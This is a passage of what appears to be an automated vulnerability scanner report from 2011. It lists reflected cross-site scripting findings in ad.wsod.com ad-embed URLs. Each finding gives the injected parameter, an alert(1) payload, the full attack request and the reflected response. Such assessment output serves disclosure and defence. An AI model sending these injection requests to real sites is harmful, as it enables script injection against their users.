Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a8a"-alert(1)-"d8d13c332e8 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Ge2a8a"-alert(1)-"d8d13c332e8&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b9ef"-alert(1)-"fca189d9ed0 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!4b9ef"-alert(1)-"fca189d9ed0&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681
5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7da8c"-alert(1)-"7e28ca43465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&7da8c"-alert(1)-"7e28ca43465=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c33'-alert(1)-'0a2fa29519b was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:05 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843025:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:05 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } ...[SNIP]...
The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9758b'-alert(1)-'3377d1f28de was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:01 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843021:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:01 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; re ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8f8'-alert(1)-'9db56fcbc1b was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:19 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843039:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:19 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { docume ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc220'-alert(1)-'63411dca46a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:34 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843054:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b108 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88997'-alert(1)-'ecbfd9fe416 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:29 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843049:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:29 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write(' ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df16'-alert(1)-'6ca3ac2d5fd was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:14 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843034:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:14 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image35 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2e9f'-alert(1)-'f8feea60c6c was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:10 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843030:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:10 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } fun ...[SNIP]...
5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baa4c'-alert(1)-'46b9da792e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:38 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:38 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:40771:1303843058:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:38 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 920
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image353() { document.write('<a href="//ad.wsod.com/click/8bec9b1 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b088d'-alert(1)-'3a36277583e was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:41:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:29 GMT; path=/ Set-Cookie: i_1=33:353:198:141:0:45001:1303843289:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:29 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 858
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } ...[SNIP]...
The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eff5'-alert(1)-'4670c7c8014 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L
Response
